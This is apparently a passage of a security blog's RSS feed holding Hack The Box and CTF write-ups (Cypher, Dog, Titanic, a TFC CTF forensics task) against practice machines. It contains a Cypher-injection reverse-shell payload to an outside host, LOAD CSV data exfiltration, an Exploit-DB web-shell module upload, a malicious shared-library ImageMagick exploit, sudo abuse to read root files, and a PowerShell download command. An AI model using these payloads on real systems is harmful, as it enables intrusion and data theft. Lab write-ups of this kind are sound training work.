I went back to the login page and started playing with the body of the request. By inserting a &lt;code&gt;&apos;&lt;/code&gt; inside the &lt;code&gt;username&lt;/code&gt; object, I triggered an error that indicated a Neo4j syntax issue. The error message revealed that the application was constructing a Cypher query using the provided username and password, and the single quote caused a parsing failure in the query. The error specifically mentioned a syntax error due to an unclosed string literal, which suggests that the input was not being properly sanitized or escaped before being included in the query.&lt;/p&gt;
&lt;h2&gt;Exploiting Cypher injection&lt;/h2&gt;
&lt;p&gt;&lt;img src=&quot;20250302151410.png&quot; alt=&quot;&quot; /&gt;
This behavior points to a potential vulnerability to Cypher injection, similar to SQL injection, where malicious input could manipulate the query&apos;s logic. To exploit this further, I used a simple payload from &lt;a href=&quot;https://www.varonis.com/blog/neo4jection-secrets-data-and-cloud-exploits&quot;&gt;Neo4jection: Secrets, Data, and Cloud Exploits&lt;/a&gt;
&lt;img src=&quot;20250302150730.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.11.57 - - [02/Mar/2025 14:30:33] &quot;GET /?l=USER HTTP/1.1&quot; 200 -
10.10.11.57 - - [02/Mar/2025 14:30:33] &quot;GET /?l=HASH HTTP/1.1&quot; 200 -
10.10.11.57 - - [02/Mar/2025 14:30:33] &quot;GET /?l=DNS_NAME HTTP/1.1&quot; 200 -
10.10.11.57 - - [02/Mar/2025 14:30:33] &quot;GET /?l=SHA1 HTTP/1.1&quot; 200 -
10.10.11.57 - - [02/Mar/2025 14:30:33] &quot;GET /?l=SCAN HTTP/1.1&quot; 200 -
10.10.11.57 - - [02/Mar/2025 14:30:33] &quot;GET /?l=ORG_STUB HTTP/1.1&quot; 200 -
10.10.11.57 - - [02/Mar/2025 14:30:33] &quot;GET /?l=IP_ADDRESS HTTP/1.1&quot; 200 -
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;it&apos;s possible to retrieve the value of a property from the node if we treat it as a map: n[key], so we can use LOAD CSV to exfiltrate the data of the properties we got already
&lt;img src=&quot;20250302150654.png&quot; alt=&quot;&quot; /&gt;
And we got the values of the properties.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.11.57 - - [02/Mar/2025 14:33:26] &quot;GET /?name=graphasm HTTP/1.1&quot; 200 -
10.10.11.57 - - [02/Mar/2025 14:33:45] &quot;GET /?value=9f54ca4c130be6d529a56dee59dc2b2090e43acf HTTP/1.1&quot; 200 -
10.10.11.57 - - [02/Mar/2025 14:34:26] &quot;GET /?host=211.255.9.117 HTTP/1.1&quot; 200 -
10.10.11.57 - - [02/Mar/2025 14:35:08] &quot;GET /?parent_uuid=d0ba01af-b882-4284-92f4-01412cb123c4 HTTP/1.1&quot; 200 -
10.10.11.57 - - [02/Mar/2025 14:35:08] &quot;GET /?scope_distance=0 HTTP/1.1&quot; 200 -
10.10.11.57 - - [02/Mar/2025 14:35:08] &quot;GET /?uuid=d0ba01af-b882-4284-92f4-01412cb123c4 HTTP/1.1&quot; 200 -
10.10.11.57 - - [02/Mar/2025 14:35:08] &quot;GET /?scan=SCAN:eb3cf8eb641dd2e8005128c2fee4b43e59fd7785 HTTP/1.1&quot; 200 -
10.10.11.57 - - [02/Mar/2025 14:35:08] &quot;GET /?type=SCAN HTTP/1.1&quot; 200 -
10.10.11.57 - - [02/Mar/2025 14:35:09] &quot;GET /?web_spider_distance=0 HTTP/1.1&quot; 200 -
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;we have the username &lt;strong&gt;graphasm&lt;/strong&gt; and the SHA1 password hash, I tried to crack the hash but no luck.&lt;/p&gt;
&lt;h2&gt;Getting a reverse shell&lt;/h2&gt;
&lt;p&gt;Do you remember the jar file we found that creates the custom procedure, we can attempt to inject a reverse shell by calling this custom procedure.
&lt;img src=&quot;20250302175214.png&quot; alt=&quot;&quot; /&gt;
So I crafted a payload that calls the getUrlStatusCode procedure and inject a revshell&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;{
  &quot;username&quot;: &quot;&apos; Return 1 Union CALL custom.getUrlStatusCode(&apos;http://10.10.14.168:8000/ ; /bin/bash -c \&quot;bash -i &amp;gt;&amp;amp; /dev/tcp/10.10.14.168/4444 0&amp;gt;&amp;amp;1\&quot;&apos;) YIELD statusCode AS s RETURN 1 // &quot;,
  &quot;password&quot;: &quot;anything&quot;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;img src=&quot;20250303092812.png&quot; alt=&quot;&quot; /&gt;
I sent this request while I had a listener opened on port 4444, and got a revshell as neo4j&lt;/p&gt;
&lt;h2&gt;Lateral movement&lt;/h2&gt;
&lt;p&gt;&lt;img src=&quot;20250302194128.png&quot; alt=&quot;&quot; /&gt;
I typed neo4j --help and noticed this env variable called &lt;strong&gt;NEO4J_HOME&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;neo4j@cypher:~$ cd $NEO4J_HOME
cd $NEO4J_HOME
neo4j@cypher:~$ ls -al
ls -al
total 68
drwxr-xr-x 15 neo4j adm   4096 Mar  3 10:18 .
drwxr-xr-x 50 root  root  4096 Feb 17 16:48 ..
-rw-r--r--  1 neo4j neo4j   63 Oct  8 18:07 .bash_history
drwxr-xr-x  4 neo4j neo4j 4096 Mar  3 08:56 .bbot
drwxrwxr-x  3 neo4j adm   4096 Oct  8 18:07 .cache
drwxr-xr-x  2 neo4j adm   4096 Aug 16  2024 certificates
drwxr-xr-x  3 neo4j neo4j 4096 Mar  3 08:56 .config
drwxr-xr-x  6 neo4j adm   4096 Oct  8 18:07 data
drwx------  3 neo4j neo4j 4096 Mar  3 10:37 .gnupg
drwxr-xr-x  2 neo4j adm   4096 Aug 16  2024 import
drwxr-xr-x  2 neo4j adm   4096 Feb 17 16:24 labs
drwxr-xr-x  2 neo4j adm   4096 Aug 16  2024 licenses
drwxr-xr-x  3 neo4j neo4j 4096 Mar  3 10:18 .local
-rw-r--r--  1 neo4j adm     52 Oct  2 15:55 packaging_info
drwxr-xr-x  2 neo4j adm   4096 Mar  3 08:41 plugins
drwxr-xr-x  2 neo4j adm   4096 Feb 17 16:24 products
drwxr-xr-x  2 neo4j adm   4096 Mar  3 07:41 run
lrwxrwxrwx  1 neo4j adm      9 Oct  8 18:07 .viminfo -&amp;gt; /dev/null
neo4j@cypher:~$ 

&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I found a .config folder that contains a folder bbolt that contains two files, &lt;strong&gt;bbot.yml&lt;/strong&gt; and &lt;strong&gt;secrets.yml&lt;/strong&gt;
I looked for anything interesting inside these two files and found a credentials for Neo4j database.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ tail secrets.yml &amp;amp;&amp;amp; echo
#   http:
#     username: &apos;&apos;
#     password: &apos;&apos;
#   websocket:
#     token: &apos;&apos;
#   splunk:
#     hectoken: &apos;&apos;
#   neo4j:
#     username: neo4j
#     password: bbotislife
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I tried to access ssh as graphasm with this password but not luck. And, then I displayed the content of .bash_history and found some interesting stuff.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ cat .bash_history
neo4j-admin dbms set-initial-password cU4btyib.20xtCMCXkBmerhK
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The admin has set a initial password to neo4j. Again, I tried to access ssh as graphasm with this password and I succeded
&lt;img src=&quot;20250303105527.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;h1&gt;Privilege escalation&lt;/h1&gt;
&lt;p&gt;Let&apos;s check what &lt;code&gt;graphasm&lt;/code&gt; can run with &lt;code&gt;sudo&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ graphasm@cypher:~$ sudo -l
Matching Defaults entries for graphasm on cypher:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User graphasm may run the following commands on cypher:
    (ALL) NOPASSWD: /usr/local/bin/bbot
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;We can see that &lt;code&gt;graphasm&lt;/code&gt; has &lt;strong&gt;passwordless sudo access&lt;/strong&gt; to execute &lt;code&gt;/usr/local/bin/bbot&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;bbot&lt;/code&gt; is a multipurpose scanner built to automate &lt;strong&gt;Recon&lt;/strong&gt;, &lt;strong&gt;Bug Bounties&lt;/strong&gt;, and &lt;strong&gt;ASM&lt;/strong&gt;.&lt;br /&gt;
It allows loading and executing custom modules as well as loading custom YARA rules.&lt;br /&gt;
We can exploit this feature to read the root flag.&lt;/p&gt;
&lt;p&gt;To achieve this, I executed the following command:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;sudo bbot --custom-yara-rules=/root/root.txt --dry-run -d
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;--dry-run&lt;/code&gt;: Prevents the scan from executing (useful for testing).&lt;/li&gt;
&lt;li&gt;&lt;code&gt;-d&lt;/code&gt;: Enables debug mode, allowing us to see the content of the imported YARA rule.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;By using this method, we can successfully read the root flag.
&lt;img src=&quot;20250303170732.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
</content:encoded></item><item><title>Dog</title><link>https://dahmanisec.me/posts/dog/dog/</link><guid isPermaLink="true">https://dahmanisec.me/posts/dog/dog/</guid><description>Hack The Box linux machine, easy difficulty</description><pubDate>Mon, 10 Mar 2025 00:00:00 GMT</pubDate><content:encoded>&lt;h1&gt;User Flag&lt;/h1&gt;
&lt;h2&gt;Nmap scan:&lt;/h2&gt;
&lt;pre&gt;&lt;code&gt;# Nmap 7.95 scan initiated Sat Mar  8 22:34:48 2025 as: /usr/lib/nmap/nmap -Pn -p- -A --min-rate 5000 -oN scan.txt 10.10.11.58
Warning: 10.10.11.58 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.58 (10.10.11.58)
Host is up (0.11s latency).
Not shown: 64794 closed tcp ports (reset), 739 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 97:2a:d2:2c:89:8a:d3:ed:4d:ac:00:d2:1e:87:49:a7 (RSA)
|   256 27:7c:3c:eb:0f:26:e9:62:59:0f:0f:b1:38:c9:ae:2b (ECDSA)
|_  256 93:88:47:4c:69:af:72:16:09:4c:ba:77:1e:3b:3b:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-git: 
|   10.10.11.58:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file &apos;description&apos; to name the...
|_    Last commit message: todo: customize url aliases.  reference:https://docs.backdro...
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.md /web.config /admin 
| /comment/reply /filter/tips /node/add /search /user/register 
|_/user/password /user/login /user/logout /?q=admin /?q=comment/reply
|_http-generator: Backdrop CMS 1 (https://backdropcms.org)
|_http-title: Home | Dog
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5
OS details: Linux 5.0 - 5.14
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 199/tcp)
HOP RTT       ADDRESS
1   104.57 ms 10.10.14.1 (10.10.14.1)
2   198.47 ms 10.10.11.58 (10.10.11.58)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Mar  8 22:35:50 2025 -- 1 IP address (1 host up) scanned in 62.54 seconds
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I added &lt;code&gt;dog.htb&lt;/code&gt;to &lt;code&gt;/etc/hosts&lt;/code&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;echo -e &quot;10.10.11.58\tdog.htb&quot; | sudo tee -a /etc/hosts
10.10.11.58	dog.htb
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;From the Nmap scan, we can see that the &lt;code&gt;.git&lt;/code&gt; folder of the website is exposed. I dumped it using &lt;strong&gt;git-dumper&lt;/strong&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;git-dumper http://dog.htb ./output
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;After finishing the dump, I started analyzing the dumped project.&lt;br /&gt;
The project is using &lt;strong&gt;Backdrop CMS&lt;/strong&gt;, and I noticed a &lt;code&gt;settings.php&lt;/code&gt; file that includes some user credentials for SQL commands.
&lt;img src=&quot;1.png&quot; alt=&quot;&quot; /&gt;
I tried logging in as &lt;strong&gt;root&lt;/strong&gt; using the password &lt;code&gt;BackDropJ2024DS2024&lt;/code&gt;, but it didn&apos;t work.&lt;br /&gt;
I continued searching for any interesting information and, after a while, found that the &lt;strong&gt;Backdrop CMS version&lt;/strong&gt; is &lt;code&gt;1.27.1&lt;/code&gt;. I also discovered a &lt;strong&gt;user&lt;/strong&gt; named &lt;code&gt;Tiffany&lt;/code&gt;.
&lt;img src=&quot;2.png&quot; alt=&quot;&quot; /&gt;
I tried to login with &lt;code&gt;tiffany&lt;/code&gt; using the password I already found and I succeeded
&lt;img src=&quot;4.png&quot; alt=&quot;&quot; /&gt;
I&apos;m in as tiffany
&lt;img src=&quot;5.png&quot; alt=&quot;&quot; /&gt;
The &lt;strong&gt;1.27.1&lt;/strong&gt; version of Backdrop CMS is vulnerable to an &lt;strong&gt;authenticated RCE&lt;/strong&gt; through the upload of a malicious module. I used &lt;a href=&quot;https://www.exploit-db.com/exploits/52021&quot;&gt;this script&lt;/a&gt; from &lt;strong&gt;Exploit-DB&lt;/strong&gt; to generate a malicious module and modified it to compress the file as a &lt;strong&gt;tar archive&lt;/strong&gt;, since the &lt;strong&gt;Zip PHP extension&lt;/strong&gt; is not enabled on the server.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ python3 exploit.py http://dog.htb/
Backdrop CMS 1.27.1 - Remote Command Execution Exploit
Evil module generating...
Evil module generated! shell.tar
Go to http://dog.htb//?q=admin/modules/install and upload the shell.tar for Manual Installation.
Your shell address: http://dog.htb//modules/shell/shell.php
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I uploaded the &lt;code&gt;shell.tar&lt;/code&gt;file as a module.
&lt;img src=&quot;6.png&quot; alt=&quot;&quot; /&gt;
Then, I navigated to &lt;code&gt;http://dog.htb/modules/shell/shell.php&lt;/code&gt;.
&lt;img src=&quot;7.png&quot; alt=&quot;&quot; /&gt;
I executed the command &lt;code&gt;cat /etc/passwd&lt;/code&gt; to check for available users.
&lt;img src=&quot;3.png&quot; alt=&quot;&quot; /&gt;
The user &lt;strong&gt;www-data&lt;/strong&gt; does not have &lt;code&gt;/bin/bash&lt;/code&gt;, so obtaining a reverse shell directly is not an option. However, I found two other users: &lt;strong&gt;jobert&lt;/strong&gt; (UID 1000) and &lt;strong&gt;johncusack&lt;/strong&gt; (UID 1001).&lt;br /&gt;
I attempted to access SSH using these usernames with the MySQL password. I couldn&apos;t log in as &lt;strong&gt;jobert&lt;/strong&gt;, but I successfully logged in as &lt;strong&gt;johncusack&lt;/strong&gt;.
&lt;img src=&quot;8.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;h1&gt;Privilege escalation&lt;/h1&gt;
&lt;p&gt;&lt;strong&gt;Johncusack&lt;/strong&gt; has &lt;strong&gt;sudo&lt;/strong&gt; permissions to run &lt;strong&gt;bee&lt;/strong&gt;, a command-line utility for Backdrop CMS.
&lt;img src=&quot;9.png&quot; alt=&quot;&quot; /&gt;
I attempted to read the root flag using this command, but it failed.
&lt;img src=&quot;10.png&quot; alt=&quot;&quot; /&gt;
After some research, I found that the error could be resolved by setting the &lt;code&gt;--root&lt;/code&gt; option to the location where Backdrop CMS is installed. I tried this approach and successfully retrieved the root flag.
&lt;img src=&quot;11.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
</content:encoded></item><item><title>Takedown</title><link>https://dahmanisec.me/posts/takedown/takedown/</link><guid isPermaLink="true">https://dahmanisec.me/posts/takedown/takedown/</guid><pubDate>Fri, 07 Mar 2025 00:00:00 GMT</pubDate><content:encoded>&lt;h1&gt;Sherlock Scenario&lt;/h1&gt;
&lt;p&gt;We&apos;ve identified an unusual pattern in our network activity, indicating a possible security breach. Our team suspects an unauthorized intrusion into our systems, potentially compromising sensitive data. Your task is to investigate this incident.&lt;/p&gt;
&lt;p&gt;They gave me a pcap file called &lt;code&gt;Takedown.pcap&lt;/code&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;sudo wireshark Takedown.pcap
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;:::tip
Full writeup will be posted as soon as the machine expires.
:::&lt;/p&gt;
</content:encoded></item><item><title>Titanic</title><link>https://dahmanisec.me/posts/titanic/</link><guid isPermaLink="true">https://dahmanisec.me/posts/titanic/</guid><description>Hack The Box linux machine, easy difficulty</description><pubDate>Sun, 23 Feb 2025 00:00:00 GMT</pubDate><content:encoded>&lt;h1&gt;Nmap Scan&lt;/h1&gt;
&lt;p&gt;First, I performed an Nmap scan to identify open ports and running services:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;sudo nmap -sC -sV -T4 10.10.11.55
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;img src=&quot;image.png&quot; alt=&quot;nmap&quot; /&gt;&lt;/p&gt;
&lt;h2&gt;Website Enumeration&lt;/h2&gt;
&lt;p&gt;While exploring the website, I found a &lt;strong&gt;Book Your Trip&lt;/strong&gt; button that triggers a form submission.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;image-1.png&quot; alt=&quot;button&quot; /&gt;&lt;/p&gt;
&lt;p&gt;After filling out the form and intercepting the request with &lt;strong&gt;BurpSuite&lt;/strong&gt;, I followed the redirection and discovered an endpoint vulnerable to Path Trasversal: &lt;code&gt;/download?ticket=&lt;/code&gt;.&lt;/p&gt;
&lt;h2&gt;Path Traversal Exploit&lt;/h2&gt;
&lt;p&gt;By attempting reading  &lt;strong&gt;/etc/passwd&lt;/strong&gt;, I found a user named &lt;strong&gt;developer&lt;/strong&gt;
&lt;img src=&quot;image-2.png&quot; alt=&quot;pathtraversal&quot; /&gt;
and retrieved the user flag from:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;/home/developer/user.txt
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;Subdomain Discovery&lt;/h2&gt;
&lt;p&gt;I continued testing path traversal to access system files like &lt;code&gt;/etc/hosts&lt;/code&gt;. I discovered a &lt;strong&gt;subdomain&lt;/strong&gt; named &lt;code&gt;dev&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;image-3.png&quot; alt=&quot;dev&quot; /&gt;&lt;/p&gt;
&lt;p&gt;I added the subdomain to my &lt;code&gt;/etc/hosts&lt;/code&gt; file&lt;/p&gt;
&lt;h2&gt;Exploiting Gitea for Credentials&lt;/h2&gt;
&lt;p&gt;The server was running &lt;strong&gt;Gitea&lt;/strong&gt; in the dev subdomain. I started enumerating for its configuration file, and I found it:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;curl -X GET &quot;http://titanic.htb/download?ticket=/home/developer/gitea/data/gitea/conf/app.ini&quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;img src=&quot;image-4.png&quot; alt=&quot;config&quot; /&gt;&lt;/p&gt;
&lt;p&gt;By analyzing the configuration, I located the database at:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;/data/gitea/gitea.db
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;accessed it using &lt;strong&gt;SQLite&lt;/strong&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;sqlite3 _home_developer_gitea_data_gitea_gitea.db
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;img src=&quot;image-5.png&quot; alt=&quot;db&quot; /&gt;&lt;/p&gt;
&lt;h2&gt;Cracking the Hash&lt;/h2&gt;
&lt;p&gt;By default, Gitea uses PBKDF2-HMAC-SHA256 with a high iteration count for password hashing. It stores the salt and password hash as hex-encoded values in separate columns within the database. However, Hashcat requires a single string with base64-encoded segments for cracking.&lt;/p&gt;
&lt;p&gt;So, I created a script that extracts user hashes from a Gitea SQLite database and converts them into a Hashcat-compatible format you can explore it here &lt;a href=&quot;https://github.com/AbdrrahimDahmani/Gitea2Hashcat.git&quot;&gt;Gitea2Hashcat&lt;/a&gt;.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;hashcat gitea.hashes /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt --user
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and I retre=ived the password
&lt;img src=&quot;image-10.png&quot; alt=&quot;alt text&quot; /&gt;&lt;/p&gt;
&lt;h2&gt;SSH Access&lt;/h2&gt;
&lt;p&gt;Using the cracked password, I logged into the machine via SSH:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ssh developer@10.10.11.55
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;Privilege Escalation&lt;/h2&gt;
&lt;p&gt;While exploring the system, I found a script running as &lt;strong&gt;root&lt;/strong&gt; at &lt;code&gt;/opt/scripts&lt;/code&gt;:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;image-7.png&quot; alt=&quot;scripts&quot; /&gt;&lt;/p&gt;
&lt;p&gt;The script used an &lt;strong&gt;ImageMagick&lt;/strong&gt; version vulnerable to &lt;strong&gt;Arbitrary Code Execution&lt;/strong&gt;. A quick Google search led me to this PoC:&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-8rxc-922v-phg8&quot;&gt;Arbitrary Code Execution in &lt;code&gt;AppImage&lt;/code&gt; version &lt;code&gt;ImageMagick&lt;/code&gt;&lt;/a&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;gcc -x c -shared -fPIC -o /opt/app/static/assets/images/libxcb.so.1 - &amp;lt;&amp;lt; EOF
#include &amp;lt;stdio.h&amp;gt;
#include &amp;lt;stdlib.h&amp;gt;
#include &amp;lt;unistd.h&amp;gt;

__attribute__((constructor)) void init(){
    system(&quot;cat /root/root.txt &amp;gt; /tmp/root44_flag.txt&quot;);
    exit(0);
}
EOF

touch test.jpg
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;Retrieving the Root Flag&lt;/h2&gt;
&lt;p&gt;After triggering the exploit, I retrieved the &lt;strong&gt;root flag&lt;/strong&gt; from &lt;code&gt;/tmp/root44_flag.txt&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;image-8.png&quot; alt=&quot;win&quot; /&gt;&lt;/p&gt;
</content:encoded></item><item><title>TFC CTF 2024</title><link>https://dahmanisec.me/posts/tfc-ctf-2024/</link><guid isPermaLink="true">https://dahmanisec.me/posts/tfc-ctf-2024/</guid><pubDate>Sun, 04 Aug 2024 00:00:00 GMT</pubDate><content:encoded>&lt;h1&gt;HE DID WHAT?! (forensics)&lt;/h1&gt;
&lt;p&gt;The challenge provided a log file containing some verbose events that I&apos;ve noticed when dealing with the first forensics chall, they were related to remote command executions in PowerShell, identified by Event ID 4104.
The first notable event, dated 07-12-2024, included a reversed Base64 string.&lt;/p&gt;
&lt;p&gt;I decoded the Base64 string using CyberChef, revealing the following command:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(&quot;aHR0cHM6Ly9zaG9ydHVybC5hdC9pbnl1ag==&quot;))) -OutFile &quot;caca.exe&quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Decoding &lt;code&gt;aHR0cHM6Ly9zaG9ydHVybC5hdC9pbnl1ag==&lt;/code&gt; resulted in the URL &lt;code&gt;https://shorturl.at/inyuj&lt;/code&gt;, which, when accessed, downloaded the file caca.exe.&lt;/p&gt;
&lt;p&gt;Additional logs indicated a series of PowerShell commands to manipulate the previously decoded string:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$w9r4pBoZlnfIzH1keCtX = $FBtFFDr8NXp5.ToCharArray() ; [array]::Reverse($w9r4pBoZlnfIzH1keCtX) ; -join $w9r4pBoZlnfIzH1keCtX 2&amp;gt;&amp;amp;1&amp;gt; $null ;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The reversed string $w9r4pBoZlnfIzH1keCtX was converted from Base64, and the script execution command was obfuscated:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$SCr = [SyStem.TexT.encODINg]::uTF8.GeTsTrInG([SYSteM.coNVErT]::froMBaSe64STrinG(&quot;$w9r4pBoZlnfIzH1keCtX&quot;)) ;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Finally, the command executed caca.exe with the parameter &lt;code&gt;&quot;VHEEVH}x3uwcnad6u3eac3pvaj6tf&quot;&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Using dotPeek, the caca.exe file was decompiled, revealing the following C# code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public static void td4306d885b1c98544112b830f9bd97c6()
{
	string str1 = &quot;&quot;;
	string str2 = &quot;TFCCTF{fake_flag_haha}&quot;;
	int num = Strings.Len(str2);
	int Start = 1;
	while (Start &amp;lt;= num)
	{
		str1 += Conversions.ToString(Strings.Chr(checked (Strings.Asc(Strings.Mid(str2, Start, 1)) + 2)));
		checked { ++Start; }
	}
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The function &lt;code&gt;td4306d885b1c98544112b830f9bd97c6&lt;/code&gt; indicated that the encrypted flag was obfuscated with a Caesar cipher (shift of +2).&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;The provided parameter &lt;code&gt;&quot;VHEEVH}x3uwcnad6u3eac3pvaj6tf&quot;&lt;/code&gt; was decrypted by shifting each character&apos;s ASCII value by -2: using &lt;a href=&quot;https://www.dcode.fr/caesar-cipher&quot;&gt;dcode&lt;/a&gt; with &lt;code&gt;Shift/Key=2&lt;/code&gt; and &lt;code&gt;Use a custom alphabet (A-Z0-9 chars only) checked&lt;/code&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This resulted in the actual flag: &lt;code&gt;TFCCTF{v1sual_b4s1c_a1nt_h4rd}&lt;/code&gt;&lt;/p&gt;
</content:encoded></item></channel></rss>